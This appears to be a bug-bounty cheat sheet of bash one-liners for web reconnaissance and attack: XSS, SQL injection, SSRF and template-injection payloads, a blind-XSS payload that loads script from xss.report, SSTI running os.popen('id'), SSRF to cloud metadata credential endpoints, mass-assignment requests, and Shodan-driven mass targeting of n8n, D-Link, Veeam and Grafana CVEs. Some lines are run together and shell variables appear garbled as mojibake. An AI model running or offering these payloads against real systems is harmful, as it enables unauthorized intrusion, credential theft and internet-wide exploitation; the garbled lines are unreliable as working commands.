cat urls.txt | gf xss | qsreplace '"><script src=https://xss.report/c/YOURID></script>' | httpx -silent
echo target.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
cat urls.txt | gf xss | uro | xargs -I@ curl -s "https://knoxss.me/api/v3" -d "target=@" -H "X-API-KEY: YOUR_KEY"
cat js.txt | xargs -I@ bash -c 'curl -s @ | grep -E "(document\.(location|URL|cookie|domain|referrer)|innerHTML|outerHTML|eval\(|\.write\()" && echo "--- @ ---"'
cat urls.txt | httpx -silent | nuclei -dast -t dast/vulnerabilities/xss/ -rl 50
cat urls.txt | kxss 2>/dev/null | grep -v "Not Reflected" | anew reflected_params.txt
cat urls.txt | gf xss | qsreplace "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcLiCk=alert() )//" | httpx -silent -mr "alert"
cat urls.txt | gf sqli | uro | anew sqli.txt && sqlmap -m sqli.txt --batch --random-agent --level 2 --risk 2
cat urls.txt | gf sqli | qsreplace "'" | httpx -silent -ms "error|sql|syntax|mysql|postgresql|oracle" | anew sqli_errors.txt
cat urls.txt | gf sqli | qsreplace "1' AND SLEEP(5)-- -" | httpx -silent -timeout 10 | anew time_based.txt
cat sqli.txt | xargs -I@ ghauri -u @ --batch --level 3cat urls.txt | gf sqli | qsreplace "1 UNION SELECT NULL,NULL,NULL-- -" | httpx -silent -mc 200
cat urls.txt | gf sqli | qsreplace "1' AND '1'='1" | httpx -silent -mc 200 | anew boolean_sqli.txt
cat urls.txt | qsreplace '{"$gt":""}' | httpx -silent -mc 200 | anew nosqli.txt cat urls.txt | qsreplace "admin'||'1'=='1" | httpx -silent | anew nosqli.txt
cat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx -silent
cat urls.txt | qsreplace "http://169.254.169.254/latest/meta-data/" | httpx -silent -match-string "ami-id"
cat urls.txt | gf ssti | qsreplace "{{7*7}}" | httpx -silent -match-string "49" | anew ssti_vuln.txt
cat urls.txt | qsreplace '${7*7}' | httpx -silent -mr "49" && cat urls.txt | qsreplace '<%= 7*7 %>' | httpx -silent -mr "49"
cat params.txt | grep -iE "(url|uri|path|src|dest|redirect|redir|return|next|target|out|view|page|show|fetch|load)" | qsreplace "http://YOURSERVER" | httpx -silent
cat urls.txt | gf ssrf | qsreplace "http://7f000001.burpcollaborator.net" | httpx -silent
cat urls.txt | qsreplace "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}" | httpx -silent
katana -u https://target.com -d 10 -jc -kf all -aff -silent | anew crawl.txtgospider -s https://target.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico)" | anew
echo https://target.com | hakrawler -d 5 -subs -u | anew hakrawler.txt
paramspider -d target.com --exclude woff,css,js,png,svg,jpg -o params.txt
waymore -i target.com -mode U -oU urls.txt
katana -u https://target.com -headless -d 5 -jc -silent | anew headless_crawl.txtkatana -u https://target.com -f qurl -silent | grep "?" | anew forms.txt
# β οΈ Crawl multiple targets with JavaScript parsing and form extraction cat alive.txt | katana -d 8 -jc -kf all -aff -ef woff,css,png,svg,jpg,woff2,jpeg,gif,ico -c 50 -p 20 -silent -o katana_multi.txt
# β οΈ Full crawl with sitemap parsing and robots.txt extraction gospider -S alive.txt -c 30 -d 5 -t 20 --sitemap --robots --js -a -w --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg)" -o gospider_output && cat gospider_output/* | grep -oE 'https?://[^"]+' | sort -u | anew gospider_urls.txt
# β οΈ Triple source crawling: live + wayback + gau echo target.com | hakrawler -d 5 -subs -u > hakrawler.txt && waybackurls target.com > wayback.txt && gau target.com > gau.txt && cat hakrawler.txt wayback.txt gau.txt | sort -u | httpx -silent | anew all_crawled.txt
# β οΈ Headless browser crawl with form interaction and XHR capture katana -u https://target.com -headless -d 6 -jc -aff -xhr -form -timeout 15 -silent -nc -c 20 | anew headless_interactive.txt
# β οΈ Crawl with built-in secrets/endpoints/parameters extraction cariddi -u https://target.com -d 5 -s -e -ext 1 -plain -t 50 -c 20 | tee cariddi_results.txt && grep -E "(api|secret|key|token|pass|auth)" cariddi_results.txt | anew secrets_found.txt
# β οΈ Mass parallel crawling with deduplication cat domains.txt | parallel -j 10 "katana -u https://{} -d 5 -jc -silent" | uro | anew parallel_crawl.txt
# β οΈ Combined crawling + JS endpoint extraction pipeline katana -u https://target.com -d 5 -jc -silent | grep "\.js$" | httpx -silent | xargs -I@ bash -c 'curl -s @ | grep -oE "(\/[a-zA-Z0-9_\-\/]+)" | sort -u' | anew js_endpoints.txt && gospider -s https://target.com -d 5 -c 10 --js -q | grep -oE 'https?://[^"]+' | anew combined_crawl.txt
# β οΈ Crawl then auto-scan discovered endpoints for vulnerabilities katana -u https://target.com -d 6 -jc -kf all -aff -silent | tee crawl_output.txt | grep -E "\.(php|asp|aspx|jsp|do|action)(\?|$)" | nuclei -t /root/nuclei-templates/ -severity high,critical -silent -o crawl_vulns.txt
# β οΈ Merge historical URLs with live crawl for maximum coverage waymore -i target.com -mode U -oU waymore_urls.txt && katana -u https://target.com -d 5 -jc -aff -silent -o katana_live.txt && cat waymore_urls.txt katana_live.txt | uro | httpx -silent -mc 200,301,302,403 | anew merged_crawl.txt
# β οΈ Run all crawlers and extract unique parameters (gospider -s https://target.com -d 3 -c 10 -q; hakrawler -url https://target.com -d 3; katana -u https://target.com -d 3 -jc -silent) | sort -u | unfurl -u keys | sort | uniq -c | sort -rn | head -100 | anew top_params.txt
X8 Hidden Parameters
cat urls.txt | httpx -silent | xargs -I@ x8 -u @ -w params.txt
arjun -i urls.txt -oT arjun_params.txt --stable
cat urls.txt | sed 's/$/\?FUZZ=test/' | ffuf -w params.txt:FUZZ -u FUZZ -mc 200,301,302 -ac
cat js.txt | xargs -I@ curl -s @ | grep -oE "[?&][a-zA-Z0-9_]+=" | cut -d'=' -f1 | tr -d '?&' | sort -u
cat urls.txt | qsreplace 'param=value1¶m=value2' | httpx -silent -mc 200
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -ac -c -t 100
# β οΈ Recursive directory bruteforce with depth 3
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 3 -mc 200,301,302,403 -ac -c -t 100 -o ffuf_recursive.json -of json# β οΈ Deep recursive scan with auto-tune and smart filtering
feroxbuster -u https://target.com -w wordlist.txt -d 5 -L 4 --auto-tune -C 404,500 --smart -o ferox_results.txt# β οΈ Scan multiple targets from file with recursion cat alive.txt | xargs -I@ feroxbuster -u @ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -d 3 -t 50 --no-state -q -o ferox_@.txt
# β οΈ Find directories with ffuf, then deep scan each with feroxbuster ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302 -ac -c -t 100 -o dirs.json -of json && cat dirs.json | jq -r '.results[].url' | xargs -I@ feroxbuster -u @ -w wordlist.txt -x php,asp,aspx,jsp,html,js -d 2 -t 30 -q
# β οΈ ffuf recursive with multiple extensions + backup files
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2 -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.conf,.config,.zip,.tar.gz -mc 200,301,302,403,500 -ac -t 80 -rate 100 -o recursive_ext.json# β οΈ Parallel scan with multiple wordlists and extensions
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx,jsp,bak,old,zip -d 4 -t 100 -L 5 --parallel 10 --dont-extract-links -C 404 -o ferox_parallel.txt# β οΈ Stealth recursive scan with custom headers and rate limiting feroxbuster -u https://target.com -w wordlist.txt -d 3 -t 30 -r -k --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1" --rate-limit 50 -C 400,401,403,404,500 -q -o ferox_stealth.txt
# β οΈ Extract links from responses and add to scan queue recursively
feroxbuster -u https://target.com -w wordlist.txt -d 5 --extract-links --collect-words --collect-backups -x php,html,js,json -t 50 -o ferox_extracted.txt# β οΈ Smart filtering by response size and resumable state
feroxbuster -u https://target.com -w wordlist.txt -d 4 -S 0 -W 1 --filter-status 404,500 --filter-words 20 --filter-lines 5 --resume-from ferox_state.json --state-file ferox_state.json -o ferox_filtered.txt# β οΈ Recursive API fuzzing with JSON content-type feroxbuster -u https://target.com/api -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -d 3 -x json -t 50 -H "Accept: application/json" -H "Content-Type: application/json" --dont-extract-links -m GET,POST -o ferox_api.txt
cat urls.txt | httpx -silent -path /.git/config -mc 200 -ms "[core]" | anew git_exposed.txt
cat urls.txt | httpx -silent -path /.env,/config.php,/wp-config.php.bak,/.htaccess,/server-status -mc 200 | anew sensitive.txt
cat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 && cat urls.txt | sed 's/$/.old/' | httpx -silent -mc 200
cat urls.txt | httpx -silent -path /swagger.json,/openapi.json,/api-docs,/swagger-ui.html -mc 200 | anew api_docs.txt
cat urls.txt | httpx -silent -path /.svn/entries,/.bzr/README,/CVS/Root -mc 200 | anew vcs_exposed.txt
cat alive.txt | httpx -silent -path /config.json,/config.yaml,/config.yml,/settings.json,/app.config -mc 200 | anew configs.txt
cat alive.txt | httpx -silent -path /database.sql,/db.sql,/backup.sql,/dump.sql -mc 200 | anew db_files.txt
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high,medium -c 50 -rl 150 -o nuclei_results.txt
nuclei -l alive.txt -t cves/ -severity critical,high -c 30 -o cve_results.txt
subfinder -d target.com -silent | httpx -silent | nuclei -t takeovers/ -c 50
nuclei -l alive.txt -t exposed-panels/ -c 50 | anew panels.txtnuclei -l alive.txt -t misconfiguration/ -severity high,critical | anew misconfig.txtnuclei -l urls.txt -dast -rl 10 -c 3 -o dast_results.txt
nuclei -l alive.txt -tags cve,rce,sqli,xss -severity critical,high -o tagged_results.txt
nuclei -l ips.txt -t network/ -c 25 -o network_vulns.txt
cat urls.txt | httpx -silent -path /graphql -mc 200 | xargs -I@ curl -s @ -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' | grep -v "error"
cat alive.txt | httpx -silent -path /api/v1,/api/v2,/api/v3,/api/swagger.json -mc 200 | anew api_endpoints.txt
cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | anew jwts.txt
cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oiE "(api[_-]?key|apikey|api_secret)[=:]['\"]?[a-zA-Z0-9]{16,}['\"]?" | anew api_keys.txt
# Test endpoints without auth cat api_endpoints.txt | httpx -silent -mc 200 -fc 401,403 | anew no_auth_endpoints.txt
for i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" "https://target.com/api/endpoint"; done | sort | uniq -c
cat urls.txt | grep -oE "(id|user_id|account_id|uid)=[0-9]+" | sed 's/=[0-9]*/=FUZZ/' | sort -u | anew bola_candidates.txt
# β οΈ Fuzz API endpoints with common paths and methods ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,201,204,301,302,401,403,405 -ac -c -t 100 -H "Content-Type: application/json" -o api_fuzz.json -of json
# β οΈ Discover hidden API versions ffuf -u https://target.com/api/vFUZZ/users -w <(seq 1 20) -mc 200,201,401,403 -ac -c && ffuf -u https://target.com/FUZZ/users -w <(echo -e "api\nv1\nv2\nv3\nv4\napi/v1\napi/v2\napi/v3\napi/internal\napi/private\napi/admin\napi/dev\napi/test\napi/staging\napi/beta") -mc 200,201,401,403 -ac -c
# β οΈ Test all HTTP methods on API endpoints cat api_endpoints.txt | while read url; do for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X $method "$url" -H "Content-Type: application/json"); echo "$method $url - $CODE"; done; done | grep -vE " - (404|405)$" | anew api_methods.txt
# β οΈ Fuzz GraphQL endpoints for introspection and queries ffuf -u https://target.com/FUZZ -w <(echo -e "graphql\ngraphiql\nplayground\nconsole\nquery\ngql\nv1/graphql\nv2/graphql\napi/graphql\napi/gql") -mc 200,400 -ac -c -H "Content-Type: application/json" -d '{"query":"{__typename}"}' -X POST -o graphql_endpoints.json
# β οΈ Discover hidden API parameters with arjun + ffuf combo cat api_endpoints.txt | xargs -I@ -P5 arjun -u @ -m POST -oT arjun_params.txt && cat api_endpoints.txt | xargs -I@ ffuf -u @?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -mc 200,201,400,500 -ac -c -t 50 -o param_fuzz.json
# β οΈ Test auth bypass techniques on protected endpoints cat api_endpoints.txt | while read url; do curl -s -o /dev/null -w "%{http_code} - $url\n" "$url" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1" -H "X-Remote-IP: 127.0.0.1" -H "X-Remote-Addr: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1"; done | grep "^200" | anew auth_bypass.txt
# β οΈ Find and extract endpoints from OpenAPI specs ffuf -u https://target.com/FUZZ -w <(echo -e "swagger.json\nswagger.yaml\nopenapi.json\nopenapi.yaml\napi-docs\napi-docs.json\nswagger-ui.html\nswagger/v1/swagger.json\nv1/swagger.json\nv2/swagger.json\nv3/swagger.json\napi/swagger.json\ndocs/api\napi/docs") -mc 200 -ac -c | tee swagger_found.txt | xargs -I@ curl -s @ | jq -r '.paths | keys[]' 2>/dev/null | anew swagger_paths.txt
# β οΈ Mass API fuzzing with nuclei DAST mode cat api_endpoints.txt | httpx -silent -mc 200,201,401,403 | nuclei -dast -t dast/vulnerabilities/ -H "Content-Type: application/json" -rl 20 -c 5 -o api_nuclei_dast.txt
# β οΈ Test for mass assignment vulnerabilities cat api_endpoints.txt | grep -iE "(user|account|profile|register|signup|update)" | xargs -I@ curl -s -X POST @ -H "Content-Type: application/json" -d '{"admin":true,"role":"admin","isAdmin":true,"is_admin":1,"privilege":"admin","access_level":9999}' -o /dev/null -w "%{http_code} - @\n" | grep -E "^(200|201|204)" | anew mass_assignment.txt
# β οΈ Generate API wordlist from JS files and fuzz cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\']/(api|v[0-9])/[a-zA-Z0-9/_-]+[\"\']" | tr -d "\"'" | sort -u > custom_api_wordlist.txt && ffuf -u https://target.com/FUZZ -w custom_api_wordlist.txt -mc 200,201,204,401,403,500 -ac -c -t 80 -H "Authorization: Bearer null" -o custom_api_fuzz.json
cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt
cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txt
cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt
cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"
cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt
#!/bin/bash domain=1γγ« mkdir -p $domain && cd $domain # Subdomains subfinder -d $domain -all -silent | anew subs.txt amass enum -passive -d $domain | anew subs.txt assetfinder -subs-only $domain | anew subs.txt # Alive check cat subs.txt | httpx -silent -threads 100 | anew alive.txt # URLs cat alive.txt | katana -d 5 -jc -silent | anew urls.txt cat alive.txt | waybackurls | anew urls.txt cat alive.txt | gau --threads 50 | anew urls.txt # Vulnerability patterns cat urls.txt | gf xss | anew xss.txt cat urls.txt | gf sqli | anew sqli.txt cat urls.txt | gf ssrf | anew ssrf.txt cat urls.txt | gf lfi | anew lfi.txt # Nuclei scan nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
#!/bin/bash target=1γγ« echo $target | waybackurls | anew urls.txt echo $target | gau | anew urls.txt cat urls.txt | gf xss | uro | qsreplace '"><img src=x onerror=alert(1)>' | airixss -payload "alert(1)" | tee xss_found.txt cat urls.txt | gf xss | uro | dalfox pipe --silence | tee -a xss_found.txt
#!/bin/bash target=1γγ« mkdir -p $target/api && cd $target/api # Find API endpoints cat ../alive.txt | httpx -silent -path /api,/api/v1,/api/v2,/swagger.json,/openapi.json | anew api_endpoints.txt # Extract from JS cat ../js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+)" | sort -u | anew js_api_endpoints.txt # Test GraphQL cat ../alive.txt | httpx -silent -path /graphql,/graphiql,/playground -mc 200 | anew graphql.txt echo "[+] API recon complete!"
Add to your .bashrc or .zshrc:
# Quick recon recon() { subfinder -d 1γγ« -silent | anew subs.txt assetfinder -subs-only 1γγ« | anew subs.txt cat subs.txt | httpx -silent | anew alive.txt echo "[+] Found $(wc -l < alive.txt) alive hosts" } # XSS scan xscan() { echo 1γγ« | waybackurls | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" } # SQLi scan sqscan() { echo 1γγ« | waybackurls | gf sqli | uro | qsreplace "'" | httpx -silent -ms "error|syntax|mysql" } # JS recon jsrecon() { echo 1γγ« | waybackurls | grep -iE "\.js$" | httpx -silent | nuclei -t exposures/ } # Nuclei quick nuke() { echo 1γγ« | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high } # Full pipeline fullrecon() { recon 1γγ« cat alive.txt | katana -d 3 -jc -silent | anew urls.txt cat urls.txt | gf xss | anew xss.txt cat urls.txt | gf sqli | anew sqli.txt nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt } # Certificate search cert() { curl -s "https://crt.sh/?q=%25.1γγ«&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u } # Parameter extraction params() { echo 1γγ« | waybackurls | grep "=" | uro | unfurl keys | sort -u } # Subdomain takeover check takeover() { subfinder -d 1γγ« -silent | httpx -silent | nuclei -t takeovers/ -c 50 } # Port scan portscan() { naabu -host 1γγ« -top-ports 1000 -silent | httpx -silent | anew 1γγ«_ports.txt } # Screenshot all screenshot() { cat 1γγ« | xargs -I@ gowitness single @ -o screenshots/ }
π Critical Unauthenticated RCE in n8n Workflow Automation - 100,000+ servers affected! Added to CISA KEV π
shodan search "n8n" --fields ip_str,port,hostnames | awk '{print "https://"1γγ«":"2γγ«}' | httpx -silent | anew n8n_targets.txt
cat alive.txt | httpx -silent -match-string "n8n" -match-string "workflow" -title | grep -i "n8n" | anew n8n_instances.txt
cat n8n_targets.txt | xargs -I@ -P20 sh -c 'curl -s -o /dev/null -w "%{http_code}" -X POST @/webhook-test/test -H "Content-Type: multipart/form-data" 2>/dev/null | grep -qE "^(200|400|500)$" && echo "POTENTIAL: @"' | tee n8n_webhook_check.txt
curl -s -X POST "https://target.com/webhook/ID" -H "Content-Type: application/json" --data '{"test":1}' -w "\n%{http_code}" | tail -1 | grep -qE "^(200|400)$" && echo "Webhook accepts requests"
cat n8n_targets.txt | httpx -silent -path /rest/settings -match-regex '"versionCli":"[0-9]+\.[0-9]+\.[0-9]+"' | anew n8n_versions.txt
nuclei -l n8n_targets.txt -t http/cves/2026/CVE-2026-21858.yaml -c 30 -o ni8mare_vuln.txt
β οΈ Affected: n8n < 1.121.0 | β Fix: Update to n8n 1.121.0+
π Authenticated RCE via Git Node in n8n - Cloud & Self-hosted affected! π
cat n8n_targets.txt | httpx -silent -path /rest/node-types -match-string "git" | anew n8n_git_enabled.txt
cat n8n_targets.txt | httpx -silent -path /rest/login -mc 200,401 -title | anew n8n_auth_endpoints.txt
β οΈ Affected: n8n < 1.121.3 | β Fix: Update to n8n 1.121.3+
π Command Injection in Legacy D-Link DSL Routers - Under active exploitation! π
shodan search "D-Link DSL" --fields ip_str,port | awk '{print 1γγ«":"2γγ«}' | httpx -silent | anew dlink_dsl_targets.txt
cat dlink_dsl_targets.txt | httpx -silent -path /dnscfg.cgi -mc 200,401 | anew dlink_dnscfg.txt
cat alive.txt | httpx -silent -match-string "D-Link" -match-string "DSL" -title -tech-detect | anew dlink_routers.txt
β οΈ Affected: Legacy D-Link DSL Gateway Routers (EOL) | β Fix: Replace with supported devices
π RCE via Postgres Parameter Injection in Veeam Backup & Replication π
shodan search "Veeam" --fields ip_str,port | awk '{print "https://"1γγ«":"2γγ«}' | httpx -silent | anew veeam_targets.txt
cat alive.txt | httpx -silent -match-string "Veeam" -title -tech-detect | grep -i "veeam" | anew veeam_instances.txt
β οΈ Affected: Veeam B&R 13.0.1.180 and earlier | β Fix: Update to 13.0.1.1071+
π Zero-Day XSS in Grafana - 46,500+ instances still vulnerable! Account Takeover possible π
shodan search "Grafana" --fields ip_str,port,hostnames | awk '{print "https://"1γγ«":"2γγ«}' | httpx -silent | anew grafana_targets.txt
cat grafana_targets.txt | httpx -silent -path /api/frontend/settings -match-regex '"version":"[0-9]+\.[0-9]+\.[0-9]+"' | anew grafana_versions.txt
cat grafana_targets.txt | xargs -I@ sh -c 'curl -sI "@/login?redirect=//" 2>/dev/null | grep -i "location" && echo "CHECK: @"' | tee grafana_redirect_check.txt
cat alive.txt | httpx -silent -path /login -match-string "Grafana" -title | anew grafana_logins.txt
β οΈ Affected: Multiple Grafana versions | β Fix: Update to latest patched version
π 10 Oneliners to hunt CVE-2026 vulnerabilities across subdomains at scale! π
subfinder -d target.com -silent | httpx -silent -title -tech-detect | tee alive_subs.txt | while read line; do echo "$line" | grep -qiE "(n8n|grafana|d-link)" && echo "[CVE-2026 TARGET] $line"; done | anew cve2026_targets.txt
subfinder -d target.com -silent | httpx -silent | xargs -I@ -P30 sh -c 'curl -s "@/rest/settings" 2>/dev/null | grep -q "versionCli" && echo "[N8N FOUND] @"' | tee n8n_subs.txt | xargs -I@ nuclei -u @ -t http/cves/2026/CVE-2026-21858.yaml -silent
cat subdomains.txt | httpx -silent | xargs -I@ -P20 sh -c 'curl -s "@/rest/node-types" 2>/dev/null | grep -qi "git" && curl -s "@/rest/settings" 2>/dev/null | grep -qE "versionCli.*1\.(([0-9]|[0-9][0-9]|1[01][0-9]|120)\.[0-9]+)" && echo "[CVE-2026-21877 VULN] @"' | anew n8n_git_vuln.txt
subfinder -d target.com -silent | httpx -silent -path /api/frontend/settings -match-regex '"version":"' | tee grafana_subs.txt | xargs -I@ -P15 sh -c 'curl -sI "@/login?redirect=//evil.com" 2>/dev/null | grep -qi "location.*evil" && echo "[CVE-2025-4123 VULN] @"'
subfinder -d target.com -silent | httpx -silent | nuclei -tags cve2026 -severity critical,high -c 50 -o cve2026_nuclei_results.txt
cat subdomains.txt | httpx -silent | xargs -I@ -P25 sh -c 'for path in /webhook /webhook-test /rest/workflows; do curl -s -o /dev/null -w "%{http_code}" "@$path" 2>/dev/null | grep -qE "^(200|401|403)$" && echo "[N8N ENDPOINT] @$path" && break; done' | anew n8n_webhooks.txt
subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -iE "(d-link|router|gateway|modem|dsl)" | tee router_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/dnscfg.cgi" 2>/dev/null | grep -qi "dns" && echo "[CVE-2026-0625 POTENTIAL] @"'
subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -i "veeam" | tee veeam_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/api/v1/version" 2>/dev/null | grep -qE "13\.0\.[01]\.[0-9]+" && echo "[CVE-2025-59470 VULN] @"'
subfinder -d target.com -silent | httpx -silent -json | jq -r 'select(.technologies != null) | "\(.url) \(.technologies[])"' | grep -iE "(n8n|grafana|veeam|next)" | while read url tech; do echo "[CVE-2026 CHECK] $url - $tech"; done | anew cve2026_tech_fingerprint.txt
domain="target.com"; mkdir -p recon_$domain && cd recon_$domain && subfinder -d $domain -silent | httpx -silent -title -tech-detect -json -o httpx_out.json && cat httpx_out.json | jq -r '.url' | nuclei -t ~/nuclei-templates/http/cves/2026/ -c 30 -o cve2026_vulns.txt && echo "[+] Found $(wc -l < cve2026_vulns.txt) CVE-2026 vulnerabilities!"
π― Pro Tip: Combine with
notifyto get real-time alerts:... | notify -silent -provider slack
π― 10 Elite Oneliners for comprehensive reconnaissance - Multi-source enumeration, ASN discovery, JS analysis & more! π―
subfinder -d target.com -all -silent | anew subs.txt && assetfinder --subs-only target.com | anew subs.txt && amass enum -passive -norecursive -noalts -d target.com | anew subs.txt && cat subs.txt | httpx -silent -threads 200 -tech-detect -status-code -title -o alive_with_tech.txt
Combines Subfinder + Assetfinder + Amass for maximum subdomain coverage, then validates with httpx + technology fingerprinting
echo "target.com" | dnsx -silent -resp-only -a | xargs -I{} whois -h whois.cymru.com {} | awk '{print 1γγ«}' | grep -E "AS[0-9]+" | xargs -I{} sh -c 'whois -h whois.radb.net -- "-i origin {}" | grep -Eo "([0-9.]+){4}/[0-9]+"' | mapcidr -silent | dnsx -silent -ptr -resp-only | anew asn_discovered_hosts.txt
Discovers ASN, enumerates IP blocks, performs reverse DNS to find hidden subdomains
cat alive.txt | xargs -P 50 -I{} sh -c 'echo {} | waybackurls & echo {} | gau --threads 10 --blacklist png,jpg,gif,svg,woff,ttf & echo {} | katana -d 3 -jc -kf all -silent' | uro | anew all_urls.txt
Parallel URL collection from Wayback Machine, Common Crawl, AlienVault + active crawling with smart deduplication
cat alive.txt | katana -silent -em js,json -jc -d 2 | httpx -silent -mc 200 | tee js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} | tee /tmp/js_$$.tmp | grep -oE "(api_key|apikey|api-key|secret|token|password|aws_access|AKIA[0-9A-Z]{16})" && cat /tmp/js_$$.tmp | grep -oE "/(api|v[0-9]|admin|internal)/[a-zA-Z0-9_/?=&-]+" | sort -u' | anew js_secrets_and_endpoints.txt
Finds JS files, extracts hardcoded secrets (API keys, tokens, AWS keys) and hidden API endpoints
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | tee crt_subs.txt | dnsgen - | shuffledns -d target.com -r /usr/share/wordlists/resolvers.txt -silent -o permuted_subs.txt && cat permuted_subs.txt | httpx -silent -o alive_permuted.txt
CT logs enumeration + intelligent permutation (api β api-dev, api-staging) with mass DNS resolution
cat subs.txt | naabu -silent -top-ports 1000 -exclude-cdn -c 50 | sed 's/:/ /g' | awk '{print 1γγ«":"2γγ«}' | httpx -silent -probe -status-code -title -tech-detect -follow-redirects -random-agent -o ports_with_web_services.txt
Fast port scan + discovers web apps running on unusual ports (8080, 8443, 3000, etc)
ORG="target"; for dork in "org:$ORG password" "org:$ORG api_key" "org:$ORG secret" "org:$ORG token" "org:$ORG aws_access" "org:$ORG credentials"; do echo "[+] Searching: $dork"; gh search repos "$dork" --limit 100 | grep "^$ORG" | tee -a github_secrets.txt; sleep 2; done
Automated GitHub dorking for secrets, credentials and sensitive data exposure
cat all_urls.txt | grep -oE '(s3\.amazonaws\.com/[a-zA-Z0-9._-]+|[a-zA-Z0-9._-]+\.s3\.amazonaws\.com|storage\.googleapis\.com/[a-zA-Z0-9._-]+|[a-zA-Z0-9._-]+\.blob\.core\.windows\.net)' | sort -u | tee cloud_buckets.txt | xargs -I{} sh -c 'curl -sI https://{} | grep -q "200\|403" && echo "[+] {} - Accessible"'
Extracts and validates misconfigured cloud storage buckets from collected URLs
cat all_urls.txt | uro | grep "=" | unfurl keys | sort -u | tee all_params.txt && cat all_urls.txt | gf xss | tee xss_params.txt && cat all_urls.txt | gf ssrf | tee ssrf_params.txt && cat all_urls.txt | gf sqli | tee sqli_params.txt && cat all_urls.txt | gf redirect | tee redirect_params.txt
Extracts unique parameters and categorizes by vulnerability type (XSS, SSRF, SQLi, Redirect)
DOMAIN="target.com"; DATE=$(date +%Y%m%d); mkdir -p recon_$DATE; cd recon_$DATE; subfinder -d $DOMAIN -all -silent | anew subs_$DATE.txt; cat subs_$DATE.txt | httpx -silent -threads 200 -o alive_$DATE.txt; cat alive_$DATE.txt | nuclei -t exposures/ -silent -o new_exposures_$DATE.txt; diff ../recon_$(date -d "yesterday" +%Y%m%d)/subs_*.txt subs_$DATE.txt 2>/dev/null | grep ">" | awk '{print 2γγ«}' > new_subs_$DATE.txt; [ -s new_subs_$DATE.txt ] && notify -silent -bulk < new_subs_$DATE.txt
Full persistent recon pipeline - detects new assets daily and sends notifications
π― Pro Tip: Run oneliner #10 via cron for 24/7 monitoring:
0 */6 * * * /path/to/recon_monitor.sh
π― 10 Oneliners to extract endpoints, secrets and hidden APIs from JavaScript files! π―
cat alive.txt | katana -silent -em js -jc -d 3 | grep -E "\.js(\?|$)" | httpx -silent -mc 200 -content-length | awk '$NF > 500 {print 1γγ«}' | anew js_files.txt && cat js_files.txt | xargs -P 30 -I{} sh -c 'curl -sk {} -o js_downloaded/$(echo {} | md5sum | cut -d" " -f1).js 2>/dev/null'
Discovers all JS files with Katana, filters by size (>500 bytes), downloads for offline analysis
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null' | grep -oE '["'"'"'](\/[a-zA-Z0-9_\-\.\/]+(\?[a-zA-Z0-9_\-\.=&]+)?)['"'"'"]' | sed 's/[\"'"'"']//g' | sort -u | grep -E "^/" | grep -vE "\.(css|png|jpg|svg|gif|woff|ico)$" | anew js_endpoints.txt
